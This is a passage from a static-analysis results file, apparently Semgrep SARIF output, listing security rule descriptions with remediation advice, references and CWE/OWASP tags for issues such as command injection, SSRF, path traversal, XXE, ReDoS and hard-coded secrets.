is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource."},"help":{"markdown":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing)\n - [https://www.npmjs.com/package/serve-index](https://www.npmjs.com/package/serve-index)\n - [https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/](https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/)\n","text":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","id":"javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","name":"javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","properties":{"precision":"very-high","tags":["CWE-548: Exposure of Information Through Directory Listing","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine."},"help":{"markdown":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html)\n - [https://redfoxsec.com/blog/insecure-volume-mounts-in-docker/](https://redfoxsec.com/blog/insecure-volume-mounts-in-docker/)\n - [https://blog.quarkslab.com/why-is-exposing-the-docker-socket-a-really-bad-idea.html](https://blog.quarkslab.com/why-is-exposing-the-docker-socket-a-really-bad-idea.html)\n","text":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine."},"helpUri":"https://semgrep.dev/r/dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","id":"dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","name":"dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","CWE-862: Missing Authorization","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access."},"help":{"markdown":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access."},"helpUri":"https://semgrep.dev/r/cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","id":"cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","name":"cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-url.mysql-connection-url)\n - [https://docs.diesel.rs/master/diesel/index.html](https://docs.diesel.rs/master/diesel/index.html)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-url.mysql-connection-url","id":"rust.secrets.diesel.mysql-connection-url.mysql-connection-url","name":"rust.secrets.diesel.mysql-connection-url.mysql-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.diesel.mysql-connection-url.mysql-connection-url"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"JWT token detected"},"help":{"markdown":"JWT token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-jwt-token.detected-jwt-token)\n - [https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/](https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/)\n","text":"JWT token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-jwt-token.detected-jwt-token","id":"generic.secrets.security.detected-jwt-token.detected-jwt-token","name":"generic.secrets.security.detected-jwt-token.detected-jwt-token","properties":{"precision":"very-high","tags":["CWE-321: Use of Hard-coded Cryptographic Key","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-jwt-token.detected-jwt-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS."},"help":{"markdown":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://www.regular-expressions.info/catastrophic.html](https://www.regular-expressions.info/catastrophic.html)\n","text":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS."},"helpUri":"https://semgrep.dev/r/python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","id":"python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","name":"python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process."},"help":{"markdown":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.razor-template-injection.razor-template-injection)\n - [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)\n","text":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.razor-template-injection.razor-template-injection","id":"csharp.dotnet.security.razor-template-injection.razor-template-injection","name":"csharp.dotnet.security.razor-template-injection.razor-template-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.razor-template-injection.razor-template-injection"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself."},"help":{"markdown":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.http-response-splitting.http-response-splitting)\n - [https://www.owasp.org/index.php/HTTP_Response_Splitting](https://www.owasp.org/index.php/HTTP_Response_Splitting)\n","text":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.http-response-splitting.http-response-splitting","id":"java.lang.security.audit.http-response-splitting.http-response-splitting","name":"java.lang.security.audit.http-response-splitting.http-response-splitting","properties":{"precision":"very-high","tags":["CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.http-response-splitting.http-response-splitting"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text."},"help":{"markdown":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape)\n - [https://edx.readthedocs.io/projects/edx-developer-guide/en/latest/preventing_xss/preventing_xss_in_django_templates.html#html-escaping-translations-in-django-templates](https://edx.readthedocs.io/projects/edx-developer-guide/en/latest/preventing_xss/preventing_xss_in_django_templates.html#html-escaping-translations-in-django-templates)\n - [https://docs.djangoproject.com/en/3.1/topics/i18n/translation/#internationalization-in-template-code](https://docs.djangoproject.com/en/3.1/topics/i18n/translation/#internationalization-in-template-code)\n","text":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","id":"python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","name":"python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. "},"help":{"markdown":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.regexp-redos.regexp-redos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://www.regular-expressions.info/catastrophic.html](https://www.regular-expressions.info/catastrophic.html)\n","text":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. "},"helpUri":"https://semgrep.dev/r/javascript.express.regexp-redos.regexp-redos","id":"javascript.express.regexp-redos.regexp-redos","name":"javascript.express.regexp-redos.regexp-redos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.regexp-redos.regexp-redos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Snyk API Key detected"},"help":{"markdown":"Snyk API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Snyk API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","id":"generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","name":"generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"the `encoding` argument to Popen is only available on Python 3.6+"},"help":{"markdown":"the `encoding` argument to Popen is only available on Python 3.6+\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python36.python36-compatibility-Popen2)\n","text":"the `encoding` argument to Popen is only available on Python 3.6+"},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python36.python36-compatibility-Popen2","id":"python.lang.compatibility.python36.python36-compatibility-Popen2","name":"python.lang.compatibility.python36.python36-compatibility-Popen2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python36.python36-compatibility-Popen2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"help":{"markdown":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion)\n - [https://cwe.mitre.org/data/definitions/704.html](https://cwe.mitre.org/data/definitions/704.html)\n","text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","id":"java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","name":"java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","id":"python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","name":"python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Database instance has no logging. Missing logs can cause missing important event information."},"help":{"markdown":"Database instance has no logging. Missing logs can cause missing important event information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Database instance has no logging. Missing logs can cause missing important event information."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","id":"terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","name":"terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM."},"help":{"markdown":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4)\n - [https://cwe.mitre.org/data/definitions/326.html](https://cwe.mitre.org/data/definitions/326.html)\n - [https://www.pycryptodome.org/src/cipher/cipher](https://www.pycryptodome.org/src/cipher/cipher)\n","text":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","id":"python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","name":"python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","id":"python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","name":"python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","id":"java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","name":"java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.tainted-shelve.tainted-shelve)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.lang.file.tainted-shelve.tainted-shelve","id":"python.lang.file.tainted-shelve.tainted-shelve","name":"python.lang.file.tainted-shelve.tainted-shelve","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.file.tainted-shelve.tainted-shelve"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt."},"help":{"markdown":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or 